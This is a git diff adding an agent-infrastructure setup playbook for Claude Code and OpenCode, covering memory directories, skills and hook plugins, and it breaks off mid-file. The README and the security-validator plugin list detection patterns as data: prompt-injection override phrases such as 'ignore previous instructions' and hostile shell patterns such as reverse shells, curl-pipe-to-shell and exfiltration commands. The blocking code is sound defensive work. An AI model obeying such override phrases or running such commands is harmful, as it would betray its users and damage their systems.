b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md new file mode 100644 index 0000000..a49c395 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md @@ -0,0 +1,57 @@ +--- +name: Codebase-Expert +version: 1.0.0 +priority: 80 +triggers: + - code + - codebase + - architecture + - implementation + - function + - class + - module + - how does + - where is + - find + - search +context_budget: 8000 +--- + +# Codebase Expert + +## Overview + +Deep expertise in the current codebase, providing semantic search and contextual understanding of code structure, patterns, and implementation details. + +## Capabilities + +### Code Search +- Semantic search across all indexed files +- Find functions, classes, and modules by description +- Locate implementations of specific features + +### Architecture Understanding +- Directory structure and organization +- Module relationships and dependencies +- Entry points and exports + +### Pattern Recognition +- Common patterns used in the codebase +- Coding conventions and standards +- Architectural decisions + +## Usage + +This skill automatically activates when you ask about: +- Code structure ("How is the project organized?") +- Implementations ("Where is X implemented?") +- Functionality ("How does Y work?") +- Finding code ("Find the function that does Z") + +## Context Injection + +When active, relevant code snippets are automatically retrieved and provided as context for more accurate responses. + +--- + +*Codebase Expert Skill v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/README.md b/Setup/Claude-Cognitive-Infrastructure/README.md new file mode 100644 index 0000000..352af7d --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/README.md @@ -0,0 +1,212 @@ +# Claude Cognitive Infrastructure Setup + +Deploys the complete Claude Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven hooks. + +## What This Playbook Does + +This playbook creates the foundational `.claude/` directory structure that gives Claude-based agents their cognitive capabilities: + +- **Hook System** - Event-driven automation with security validation, session management, and event logging +- **Memory System** - Three-tier persistent knowledge (hot/warm/cold) for session history, learnings, and state +- **Skills Framework** - Modular domain expertise with tiered loading and USE WHEN activation +- **Configuration** - Settings and config files for customization + +## Infrastructure Structure + +After running this playbook, the agent will have: + +``` +Agent Directory/ +├── CLAUDE.md # Agent identity (single source of truth) +└── .claude/ + ├── settings.json # Hook configuration + ├── VERSION # Infrastructure version tracking + ├── config/ + │ └── config.yaml # Runtime settings + ├── skills/ + │ ├── CORE/ + │ │ ├── SKILL.md # Core identity skill + │ │ ├── SYSTEM/ # System documentation + │ │ │ ├── SKILLSYSTEM.md + │ │ │ ├── MEMORYSYSTEM.md + │ │ │ └── HOOKSYSTEM.md + │ │ ├── USER/ # Personal configuration + │ │ └── Workflows/ # Core workflows + │ └── CreateSkill/ + │ └── SKILL.md # Skill creation skill + ├── MEMORY/ + │ ├── README.md # Memory system docs + │ ├── State/ # Operational state + │ ├── Signals/ # Pattern detection + │ ├── Work/ # Per-task memory + │ ├── Learning/ # Phase-based learnings + │ │ ├── OBSERVE/ + │ │ ├── THINK/ + │ │ ├── PLAN/ + │ │ ├── BUILD/ + │ │ ├── EXECUTE/ + │ │ └── VERIFY/ + │ ├── research/ # Research outputs + │ ├── sessions/ # Session summaries + │ ├── learnings/ # Learning moments + │ ├── decisions/ # ADRs + │ ├── execution/ # Task logs + │ ├── security/ # Security events + │ ├── recovery/ # Recovery snapshots + │ ├── raw-outputs/ # JSONL event streams + │ └── backups/ # Pre-change backups + ├── hooks/ + │ ├── security-validator.ts # 10-tier attack pattern blocking + │ ├── initialize-session.ts # Session start handler + │ ├── load-core-context.ts # Context loader + │ ├── event-logger.ts # PostToolUse logger + │ └── session-summary.ts # Session end handler + ├── agents/ # Orchestration worker definitions + ├── scripts/ # Utility scripts + └── examples/ # Reference examples +``` + +## Hook System Features + +The playbook installs a complete hook system with: + +| Hook | Event | Purpose | +|------|-------|---------| +| `security-validator.ts` | PreToolUse (Bash) | 10-tier attack pattern blocking | +| `initialize-session.ts` | SessionStart | Session state initialization | +| `load-core-context.ts` | SessionStart | Load CORE skill context | +| `event-logger.ts` | PostToolUse | Log tool executions to MEMORY | +| `session-summary.ts` | Stop | Capture session summary | + +### Security Validator Tiers + +1. **Catastrophic** - `rm -rf /`, disk destruction (BLOCK) +2. **Reverse Shells** - Bash/netcat/socket shells (BLOCK) +3. **Credential Theft** - curl|sh, wget|sh patterns (BLOCK) +4. **Prompt Injection** - "ignore previous instructions" (BLOCK) +5. **Environment Manipulation** - API key exposure (WARN) +6. **Git Dangerous** - force push, hard reset (WARN) +7. **System Modification** - chmod 777, sudo (LOG) +8. **Network Operations** - ssh, scp, rsync (LOG) +9. **Data Exfiltration** - upload patterns (BLOCK) +10. **Infrastructure Protection** - rm .claude (BLOCK) + +## Memory System Features + +Three-tier memory architecture: + +| Tier | Temperature | Purpose | Location | +|------|-------------|---------|----------| +| **CAPTURE** | Hot | Active work items | `MEMORY/Work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `MEMORY/Learning/` | +| **APPLICATION** | Cold | Historical archive | `MEMORY/sessions/`, etc. | + +## Skills System Features + +- **YAML Frontmatter** with `USE WHEN` activation triggers +- **TitleCase naming** convention +- **Tiered loading** - frontmatter at startup, full body on invocation +- **Workflow routing** tables for multi-step procedures +- **CreateSkill** skill for generating new skills + +## Prerequisites + +- An agent directory where you want to install the infrastructure +- The agent should have a clear purpose/role (used to generate identity) +- **Bun runtime** (for TypeScript hooks) - https://bun.sh + +## Usage + +Run this playbook in the target agent's directory. The playbook will: + +1. Analyze the agent's purpose from directory name and any existing files +2. Generate appropriate agent identity (name, mission, role) +3. Create the complete `.claude/` directory structure +4. Install the Hook System with security validator +5. Initialize the Memory System with three-tier architecture +6. Create the Skills Framework with CORE and CreateSkill +7. Verify the installation + +## After Installation + +Once the infrastructure is installed, you can: + +1. Run **Knowledge Pack** playbooks to add domain expertise +2. Customize the CLAUDE.md with additional instructions +3. Add custom hooks for automation +4. Create new skills using the CreateSkill skill +5. Start using the agent with full cognitive capabilities + +## Git Configuration + +### What to Commit + +| Directory | Commit? | Reason | +|-----------|---------|--------| +| `.claude/settings.json` | Yes | Hook configuration | +| `.claude/VERSION` | Yes | Infrastructure version | +| `.claude/config/` | Yes | Runtime settings | +| `.claude/skills/` | Yes | Skill definitions | +| `.claude/skills/CORE/USER/` | No | Personal configuration | +| `.claude/MEMORY/State/` | No | Session state | +| `.claude/MEMORY/Signals/` | No | Pattern detection | +| `.claude/MEMORY/Work/` | No | Active work items | +| `.claude/MEMORY/raw-outputs/` | No | Event logs | +| `.claude/MEMORY/sessions/` | No | Session history | +| `.claude/MEMORY/security/` | No | Security events | +| `.claude/hooks/` | Yes | Event hooks | +| `CLAUDE.md` | Yes | Agent identity | + +### Recommended .gitignore + +```gitignore +# Claude Cognitive Infrastructure - Private Data +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +.claude/MEMORY/State/ +.claude/MEMORY/Signals/ +.claude/MEMORY/Work/ +.claude/skills/CORE/USER/ + +# Keep structure but ignore contents +!.claude/MEMORY/.gitkeep +!.claude/MEMORY/State/.gitkeep +``` + +## Version Migration + +### Upgrading Infrastructure + +1. **Check current version**: Read `.claude/VERSION` +2. **Backup existing**: `cp -r .claude .claude.backup` +3. **Run upgrade playbook**: Future versions will include migration scripts +4. **Verify**: Run the 5_VERIFY phase to confirm upgrade success + +### Version History + +| Version | Changes | +|---------|---------| +| 1.1.0 | Initial release with hook system, memory system, skills framework | + +## Version + +Current infrastructure version: **1.1.0** + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `settings.schema.json` | JSON schema for validating `.claude/settings.json` | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. + +## Credits + +The Claude Cognitive Infrastructure was influenced by [Daniel Miessler's](https://danielmiessler.com/) [Personal AI Infrastructure](https://github.com/danielmiessler/Personal_AI_Infrastructure) project, which pioneered many of the concepts around persistent memory, modular skills, and structured context for AI assistants. + +--- + +*Claude Cognitive Infrastructure Setup Playbook* diff --git a/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json b/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json new file mode 100644 index 0000000..0b8fd12 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json @@ -0,0 +1,97 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "$id": "https://github.com/pedramamini/Maestro-Playbooks/Setup/Claude-Cognitive-Infrastructure/schemas/settings.schema.json", + "title": "Claude Code Settings", + "description": "Configuration schema for Claude Code settings.json", + "type": "object", + "properties": { + "hooks": { + "type": "object", + "description": "Hook configurations for various triggers", + "properties": { + "preToolCall": { + "type": "array", + "description": "Hooks that run before tool calls", + "items": { + "$ref": "#/definitions/hook" + } + }, + "postToolCall": { + "type": "array", + "description": "Hooks that run after tool calls", + "items": { + "$ref": "#/definitions/hook" + } + }, + "onError": { + "type": "array", + "description": "Hooks that run when errors occur", + "items": { + "$ref": "#/definitions/hook" + } + } + }, + "additionalProperties": { + "type": "array", + "items": { + "$ref": "#/definitions/hook" + } + } + }, + "permissions": { + "type": "object", + "description": "Permission settings", + "properties": { + "allow": { + "type": "array", + "description": "Allowed operations or paths", + "items": { + "type": "string" + } + }, + "deny": { + "type": "array", + "description": "Denied operations or paths", + "items": { + "type": "string" + } + } + } + } + }, + "definitions": { + "hook": { + "type": "object", + "properties": { + "type": { + "type": "string", + "description": "Type of hook (command or script)", + "enum": ["command", "script"] + }, + "command": { + "type": "string", + "description": "Command to execute (for command type)" + }, + "script": { + "type": "string", + "description": "Path to script file (for script type)" + }, + "timeout": { + "type": "integer", + "description": "Timeout in milliseconds", + "minimum": 0, + "default": 30000 + }, + "tools": { + "type": "array", + "description": "Tools this hook applies to (empty = all tools)", + "items": { + "type": "string" + } + } + }, + "required": ["type"] + } + }, + "additionalProperties": true +} diff --git a/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md b/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md new file mode 100644 index 0000000..3715ff5 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md @@ -0,0 +1,96 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites and prepare for OpenCode Cognitive Infrastructure deployment. + +## Prerequisites Checklist + +### 1. Target Directory + +Verify the target agent directory: + +- [ ] Agent directory exists and is writable +- [ ] Directory has a clear name indicating agent purpose +- [ ] No critical files will be overwritten (or backup is acceptable) + +### 2. Existing Infrastructure Check + +Check for existing `.opencode/` directory: + +- [ ] If `.opencode/` exists, determine upgrade vs fresh install +- [ ] If upgrading, backup existing memory files +- [ ] Note any custom configurations to preserve + +### 3. Agent Context + +Gather information about the agent: + +- [ ] Agent name (from directory name) +- [ ] Organization (from parent directory, if applicable) +- [ ] Agent type/role (inferred from name or existing files) + +### 4. Runtime Requirements + +Verify required tools are installed: + +- [ ] Node.js (v18+) or Bun runtime +- [ ] OpenCode CLI installed (`opencode --version`) +- [ ] npm available for plugin dependencies + +## Agent Type Detection + +Based on directory name, detect agent type for customization: + +| Keywords in Name | Agent Type | Persona Suggestion | +|------------------|------------|-------------------| +| Sales, Lead, Pipeline | Sales | Scout | +| Engineer, Architect, Developer | Technical | Archon | +| Research, Analysis | Research | Sage | +| Marketing, Content | Marketing | Maven | +| Fundraising, Investor | Finance | Catalyst | +| Operations, Admin | Operations | Atlas | +| People, Recruiting, HR | People | Harbor | +| Executive, Chief | Executive | Aria | +| Brand, Communications | Communications | Echo | +| Strategy, Planning | Strategy | Compass | +| Customer, Success | Customer | Bridge | +| UX, Design | Design | Pixel | + +## Validation Steps + +1. Confirm agent directory path +2. Check write permissions +3. Detect agent type from name +4. Check for existing infrastructure +5. Verify OpenCode is installed +6. Determine installation mode (fresh/upgrade) + +## Installation Modes + +### Fresh Install +- Create complete `.opencode/` structure +- Generate new AGENTS.md identity +- Initialize empty memory files +- Install plugin dependencies + +### Upgrade Install +- Preserve existing memory files +- Update structure to latest version +- Add new capabilities (plugins, skills) +- Migrate configuration format if needed + +## OpenCode vs Claude Code Directory Mapping + +| Claude Code | OpenCode | Notes | +|-------------|----------|-------| +| `.claude/` | `.opencode/` | Primary config directory | +| `.claude/settings.json` | `opencode.json` | Root-level config | +| `.claude/hooks/` | `.opencode/plugin/` | Event handlers | +| `.claude/skills/` | `.opencode/skill/` | Skill definitions | +| `.claude/MEMORY/` | `.opencode/memory/` | Persistent storage | +| `CLAUDE.md` | `AGENTS.md` | Agent identity | + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md** to analyze the agent context. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md b/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md new file mode 100644 index 0000000..9abb8d0 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md @@ -0,0 +1,129 @@ +# Phase 1: Analyze Agent Context + +## Objective + +Analyze the target agent's context to determine appropriate identity, skills, and configuration. + +## Analysis Tasks + +### 1. Directory Analysis + +Examine the agent directory: + +- [ ] Read directory name for agent purpose +- [ ] Check parent directory for organization context +- [ ] Look for existing ROLE.md or similar documentation +- [ ] Identify any existing configuration files +- [ ] Check for existing `opencode.json` or `AGENTS.md` + +### 2. Agent Identity Derivation + +From the directory name, derive: + +| Component | Source | Example | +|-----------|--------|---------| +| Agent Name | Directory name | "Sales Lead Agent" | +| Organization | Parent directory | "Wayward Guardian" | +| Persona Name | Generated from type | "Scout" | +| Agent Type | Keywords in name | "Sales" | + +### 3. Role Detection + +If ROLE.md or AGENTS.md exists, extract: + +- Role description (first paragraph after title) +- Key responsibilities (bulleted lists) +- Domain expertise areas +- Integration points with other agents + +### 4. Existing Files Inventory + +Check for files that inform configuration: + +| File | Purpose | Action | +|------|---------|--------| +| ROLE.md | Role definition | Extract responsibilities | +| AGENTS.md | Existing identity | Plan upgrade | +| README.md | Documentation | Extract context | +| opencode.json | Existing config | Preserve settings | +| .opencode/ | Existing infrastructure | Plan upgrade | +| auto-run/ | Playbooks | Note for integration | + +## Agent Profile Template + +Based on analysis, build agent profile: + +```yaml +agent: + name: "" + persona: "" + organization: "" + type: "" + +identity: + mission: "" + role: "<2-3 sentence role description>" + +capabilities: + primary: [] # Core responsibilities + secondary: [] # Supporting tasks + +integrations: + collaborates_with: [] # Other agents + tools: [] # External tools + mcp_servers: [] # MCP integrations +``` + +## Analysis Outputs + +Document the following for use in later phases: + +1. **Agent Profile** - Complete identity information +2. **Installation Mode** - Fresh or upgrade +3. **Customizations Needed** - Based on agent type +4. **Preservation List** - Files to keep if upgrading + +## Type-Specific Considerations + +### Technical Agents +- Include architecture context directories +- Add development and testing contexts +- Consider code-related plugins +- Enable GitHub integration + +### Business Agents +- Include projects context +- Add working context for active tasks +- Consider CRM/pipeline integrations +- Enable MCP servers for external tools + +### Research Agents +- Emphasize knowledge context +- Add research methodology +- Consider web search capabilities +- Enable documentation MCP servers + +### Operations Agents +- Include process documentation +- Add tracking and reporting +- Consider scheduling integrations +- Enable notification plugins + +## OpenCode-Specific Considerations + +### Built-in Agents +OpenCode includes two built-in agents: +- **build** (default) - Full access agent for development work +- **plan** - Read-only agent for analysis and code exploration + +Consider how your custom agent complements these. + +### MCP Server Discovery +Check for commonly used MCP servers: +- Context7 for documentation search +- Database connectors +- API integrations + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan the infrastructure structure. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md b/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..4ce9ee9 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md @@ -0,0 +1,227 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the complete OpenCode Cognitive Infrastructure directory structure for the agent. + +## Core Directory Structure + +``` +/ +├── AGENTS.md # Agent identity file +├── opencode.json # Main configuration +└── .opencode/ + ├── VERSION # Infrastructure version (1.0.0) + ├── config/ + │ └── config.yaml # Runtime configuration + ├── skill/ + │ ├── core/ + │ │ └── SKILL.md # Core agent skill + │ └── create-skill/ + │ └── SKILL.md # Skill creation skill + ├── plugin/ + │ ├── security-validator.ts # Security hook + │ ├── session-manager.ts # Session lifecycle + │ ├── event-logger.ts # Event logging + │ └── context-loader.ts # Context loading + ├── memory/ + │ ├── README.md # Memory system docs + │ ├── state/ + │ │ └── active-work.json # Current work state + │ ├── signals/ + │ │ └── README.md # Signal detection + │ ├── work/ # Per-task memory + │ ├── learning/ + │ │ ├── observe/ + │ │ ├── think/ + │ │ ├── plan/ + │ │ ├── build/ + │ │ ├── execute/ + │ │ └── verify/ + │ ├── research/ # Research outputs + │ ├── sessions/ # Session summaries + │ ├── learnings/ # Learning moments + │ ├── decisions/ # ADRs + │ ├── execution/ # Task logs + │ ├── security/ # Security events + │ ├── recovery/ # Recovery snapshots + │ ├── raw-outputs/ # JSONL event streams + │ └── backups/ # Pre-change backups + ├── command/ + │ └── README.md # Custom commands + ├── agents/ + │ └── README.md # Custom agent definitions + └── docs/ + ├── SKILLSYSTEM.md # Skill system docs + ├── MEMORYSYSTEM.md # Memory system docs + └── PLUGINSYSTEM.md # Plugin system docs +``` + +## File Contents Plan + +### AGENTS.md (Root Identity) + +```markdown +# : + +## Your Name +Your name is ****. You are the for . + +## Your Mission + + +## Your Role + + +## Core Responsibilities + + +## Memory Management +**CRITICAL:** Update work state after EVERY conversation turn. + +## Organization Context + +``` + +### opencode.json + +```json +{ + "$schema": "https://opencode.ai/config.json", + "plugins": { + "security-validator": { + "enabled": true + }, + "session-manager": { + "enabled": true + }, + "event-logger": { + "enabled": true + }, + "context-loader": { + "enabled": true + } + }, + "skill": { + "allow": ["*"], + "deny": [] + }, + "agents": { + "build": { + "model": "anthropic:claude-sonnet-4-20250514" + }, + "plan": { + "model": "anthropic:claude-sonnet-4-20250514" + } + } +} +``` + +### VERSION + +``` +1.0.0 +``` + +### config/config.yaml + +```yaml +version: "1.0.0" +agent: + name: "" + persona: "" + type: "" +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" +``` + +### skill/core/SKILL.md + +```markdown +--- +name: core +description: Core identity and configuration. Provides agent identity, capabilities overview, and operating principles. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# Core - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Identity + +**Agent:** +**Role:** +**Organization:** + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Plugin System**: Event-driven automation +- **MCP Integration**: External tool access + +## Quick Reference + +- Skills directory: `.opencode/skill/` +- Memory directory: `.opencode/memory/` +- Configuration: `opencode.json` +``` + +### Memory Files + +**memory/README.md:** +```markdown +# Memory System + +Persistent memory architecture for session history, learnings, and operational state. + +## Directory Structure + +| Directory | Purpose | Retention | +|-----------|---------|-----------| +| `research/` | Deep research outputs | Permanent | +| `sessions/` | Session summaries | Rolling 90 days | +| `learnings/` | Learning moments | Permanent | +| `decisions/` | Architectural Decision Records | Permanent | +| `execution/` | Task execution logs | Rolling 30 days | +| `security/` | Security event logs | Permanent | +| `recovery/` | Recovery snapshots | Rolling 7 days | +| `raw-outputs/` | JSONL event streams | Rolling 7 days | +| `backups/` | Pre-refactoring backups | As needed | +| `state/` | Current operational state | Active | +| `signals/` | Pattern detection | Active | +| `work/` | Per-task memory | Active | +| `learning/` | Phase-based learnings | Permanent | +``` + +**memory/state/active-work.json:** +```json +{ + "current_task": null, + "started_at": null, + "status": "idle" +} +``` + +## Context Placeholder Files + +Each context subdirectory gets a README.md placeholder: + +```markdown +# + +This directory contains information. + +## Contents + + + +## Usage + + +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the planned structure. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md b/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md new file mode 100644 index 0000000..c241ce4 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md @@ -0,0 +1,124 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the infrastructure plan for completeness, correctness, and safety. + +## Evaluation Checklist + +### 1. Identity Completeness + +- [ ] Agent name is clear and descriptive +- [ ] Persona name is short and memorable +- [ ] Mission statement is concise (one sentence) +- [ ] Role description explains purpose (2-3 sentences) +- [ ] Responsibilities are specific and actionable + +### 2. Structure Completeness + +- [ ] All required directories planned +- [ ] All required files identified +- [ ] Memory files initialized with proper structure +- [ ] Core skill has appropriate description +- [ ] Skill names follow OpenCode naming convention (lowercase with hyphens) + +### 3. Configuration Validity + +- [ ] opencode.json is valid JSON +- [ ] opencode.json has correct schema reference +- [ ] config.yaml is valid YAML +- [ ] VERSION file contains valid semver +- [ ] File paths are correct + +### 4. Content Quality + +- [ ] AGENTS.md follows standard template +- [ ] SKILL.md files have valid frontmatter +- [ ] Memory update instruction is present +- [ ] Organization context is included + +### 5. OpenCode-Specific Validation + +- [ ] Skill names are lowercase alphanumeric with hyphens +- [ ] Skill descriptions are under 1024 characters +- [ ] Plugin files export proper Plugin type +- [ ] opencode.json plugin references match file names + +### 6. Safety Checks + +- [ ] No existing files will be overwritten without backup +- [ ] No sensitive data in templates +- [ ] Permissions are appropriate +- [ ] No destructive operations planned + +## Validation Matrix + +| Component | Required | Planned | Valid | +|-----------|----------|---------|-------| +| AGENTS.md | Yes | | | +| opencode.json | Yes | | | +| .opencode/ | Yes | | | +| VERSION | Yes | | | +| config/config.yaml | Yes | | | +| skill/core/SKILL.md | Yes | | | +| memory/ | Yes | | | +| plugin/ | Yes | | | + +## OpenCode Naming Rules + +### Skill Names +- Must be 1-64 characters +- Lowercase alphanumeric only +- Single hyphens allowed (not at start/end) +- Pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` + +**Valid:** `core`, `create-skill`, `code-review`, `my-custom-skill` +**Invalid:** `Core`, `create_skill`, `my--skill`, `-skill` + +### Plugin Names +- Should match directory/file naming +- Use kebab-case for consistency +- Export matches file name + +## Risk Assessment + +### Low Risk +- Creating new directories +- Creating new files in empty locations +- Adding README.md placeholder files + +### Medium Risk +- Overwriting existing AGENTS.md +- Modifying existing opencode.json +- Adding new plugins + +### High Risk (Require Confirmation) +- Overwriting existing memory files +- Deleting existing content +- Modifying existing skills +- Changing plugin configurations + +## Pre-Implementation Checklist + +Before proceeding to implementation: + +- [ ] All directories identified +- [ ] All file contents drafted +- [ ] Agent identity finalized +- [ ] Skill names validated against naming rules +- [ ] Plugin structure matches OpenCode Plugin type +- [ ] Backup plan for existing files (if applicable) +- [ ] No blocking issues identified + +## Approval Gate + +Implementation can proceed when: +1. All required components are planned +2. All content passes validation +3. No high-risk operations without mitigation +4. Structure matches OpenCode infrastructure specification +5. All naming conventions are followed + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md** to execute the installation. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md b/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md new file mode 100644 index 0000000..e13b040 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md @@ -0,0 +1,1057 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the complete OpenCode Cognitive Infrastructure installation including the Plugin System, Memory System, and Skills System. + +--- + +## Part 1: Directory Structure + +### Step 1.1: Create Base Directory Tree + +```bash +mkdir -p .opencode/{config,command,agents,docs} +mkdir -p .opencode/skill/{core,create-skill} +mkdir -p .opencode/plugin +mkdir -p .opencode/memory/{state,signals,work,learning/{observe,think,plan,build,execute,verify}} +mkdir -p .opencode/memory/{research,sessions,learnings,decisions,execution,security,recovery,raw-outputs,backups} +``` + +### Step 1.2: Create VERSION File + +```bash +echo "1.0.0" > .opencode/VERSION +``` + +--- + +## Part 2: Plugin System + +The Plugin System provides event-driven automation through TypeScript plugins that intercept tool executions and lifecycle events. + +### Step 2.1: Create opencode.json + +Create `opencode.json` in the agent root: + +```json +{ + "$schema": "https://opencode.ai/config.json", + "plugins": { + "security-validator": { + "enabled": true + }, + "session-manager": { + "enabled": true + }, + "event-logger": { + "enabled": true + }, + "context-loader": { + "enabled": true + } + }, + "skill": { + "allow": ["*"], + "deny": [] + }, + "agents": { + "build": { + "model": "anthropic:claude-sonnet-4-20250514" + }, + "plan": { + "model": "anthropic:claude-sonnet-4-20250514" + } + } +} +``` + +### Step 2.2: Create Security Validator Plugin + +Create `.opencode/plugin/security-validator.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; + +// Attack pattern categories - 10 tiers of protection +const ATTACK_PATTERNS = { + // Tier 1: Catastrophic - Always block + catastrophic: { + patterns: [ + /rm\s+(-rf?|--recursive)\s+[\/~]/i, + /rm\s+(-rf?|--recursive)\s+\*/i, + />\s*\/dev\/sd[a-z]/i, + /mkfs\./i, + /dd\s+if=.*of=\/dev/i, + ], + action: "block", + message: "BLOCKED: Catastrophic deletion/destruction detected", + }, + + // Tier 2: Reverse shells - Always block + reverseShell: { + patterns: [ + /bash\s+-i\s+>&\s*\/dev\/tcp/i, + /nc\s+(-e|--exec)\s+\/bin\/(ba)?sh/i, + /python.*socket.*connect/i, + /perl.*socket.*connect/i, + /ruby.*TCPSocket/i, + /php.*fsockopen/i, + /socat.*exec/i, + /\|\s*\/bin\/(ba)?sh/i, + ], + action: "block", + message: "BLOCKED: Reverse shell pattern detected", + }, + + // Tier 3: Credential theft - Always block + credentialTheft: { + patterns: [ + /curl.*\|\s*(ba)?sh/i, + /wget.*\|\s*(ba)?sh/i, + /curl.*(-o|--output).*&&.*chmod.*\+x/i, + /base64\s+-d.*\|\s*(ba)?sh/i, + ], + action: "block", + message: "BLOCKED: Remote code execution pattern detected", + }, + + // Tier 4: Prompt injection indicators - Block and log + promptInjection: { + patterns: [ + /ignore\s+(all\s+)?previous\s+instructions/i, + /disregard\s+(all\s+)?prior\s+instructions/i, + /you\s+are\s+now\s+(in\s+)?[a-z]+\s+mode/i, + /new\s+instruction[s]?:/i, + /system\s+prompt:/i, + /\[INST\]/i, + /<\|im_start\|>/i, + ], + action: "block", + message: "BLOCKED: Prompt injection pattern detected", + }, + + // Tier 5: Environment manipulation - Warn + envManipulation: { + patterns: [ + /export\s+(ANTHROPIC|OPENAI|AWS|AZURE)_/i, + /echo\s+\$\{?(ANTHROPIC|OPENAI)_/i, + /env\s*\|.*KEY/i, + /printenv.*KEY/i, + ], + action: "warn", + message: "WARNING: Environment/credential access detected", + }, + + // Tier 6: Git dangerous operations - Require confirmation + gitDangerous: { + patterns: [ + /git\s+push.*(-f|--force)/i, + /git\s+reset\s+--hard/i, + /git\s+clean\s+-fd/i, + /git\s+checkout\s+--\s+\./i, + ], + action: "warn", + message: "WARNING: Potentially destructive git operation", + }, + + // Tier 7: System modification - Log + systemMod: { + patterns: [ + /chmod\s+777/i, + /chown\s+root/i, + /sudo\s+/i, + /systemctl\s+(stop|disable)/i, + ], + action: "log", + message: "LOGGED: System modification command", + }, + + // Tier 8: Network operations - Log + network: { + patterns: [/ssh\s+/i, /scp\s+/i, /rsync.*:/i, /curl\s+(-X\s+POST|--data)/i], + action: "log", + message: "LOGGED: Network operation", + }, + + // Tier 9: Data exfiltration patterns - Block + exfiltration: { + patterns: [/curl.*(@|--upload-file)/i, /tar.*\|.*curl/i, /zip.*\|.*nc/i], + action: "block", + message: "BLOCKED: Data exfiltration pattern detected", + }, + + // Tier 10: Infrastructure protection - Block + infraProtection: { + patterns: [/rm.*\.opencode/i, /rm.*\.config/i], + action: "block", + message: "BLOCKED: Infrastructure protection triggered", + }, +}; + +function validateCommand(command: string): { + allowed: boolean; + message?: string; + action?: string; +} { + if (!command || command.length < 3) { + return { allowed: true }; + } + + for (const [tierName, tier] of Object.entries(ATTACK_PATTERNS)) { + for (const pattern of tier.patterns) { + if (pattern.test(command)) { + console.error(`[Security] ${tierName}: ${tier.message}`); + console.error(`[Security] Command: ${command.substring(0, 100)}...`); + return { + allowed: tier.action !== "block", + message: tier.message, + action: tier.action, + }; + } + } + } + + return { allowed: true }; +} + +export const SecurityValidator: Plugin = async ({ client, $ }) => { + return { + tool: { + execute: { + before: async (input, output) => { + // Check if this is a shell/bash command + if (input.name === "shell" || input.name === "bash") { + const command = input.input?.command || input.input?.cmd || ""; + const validation = validateCommand(command); + + if (!validation.allowed) { + throw new Error(validation.message); + } + + if (validation.action === "warn") { + console.warn(validation.message); + } + } + }, + }, + }, + }; +}; + +export default SecurityValidator; +``` + +### Step 2.3: Create Session Manager Plugin + +Create `.opencode/plugin/session-manager.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { writeFileSync, existsSync, mkdirSync, readFileSync } from "fs"; + +const MEMORY_DIR = ".opencode/memory"; +const STATE_DIR = `${MEMORY_DIR}/state`; +const SESSIONS_DIR = `${MEMORY_DIR}/sessions`; + +export const SessionManager: Plugin = async ({ client, $ }) => { + // Initialize session on plugin load + const sessionId = `session_${Date.now()}`; + const startedAt = new Date().toISOString(); + + // Ensure directories exist + if (!existsSync(STATE_DIR)) { + mkdirSync(STATE_DIR, { recursive: true }); + } + if (!existsSync(SESSIONS_DIR)) { + mkdirSync(SESSIONS_DIR, { recursive: true }); + } + + // Write initial session state + const sessionState = { + session_id: sessionId, + started_at: startedAt, + status: "active", + }; + + writeFileSync( + `${STATE_DIR}/active-session.json`, + JSON.stringify(sessionState, null, 2) + ); + + console.log(`[Session] Initialized: ${sessionId}`); + + return { + event: async ({ event }) => { + // Handle session end + if (event.type === "session.idle") { + const summary = { + session_id: sessionId, + started_at: startedAt, + ended_at: new Date().toISOString(), + status: "completed", + }; + + writeFileSync( + 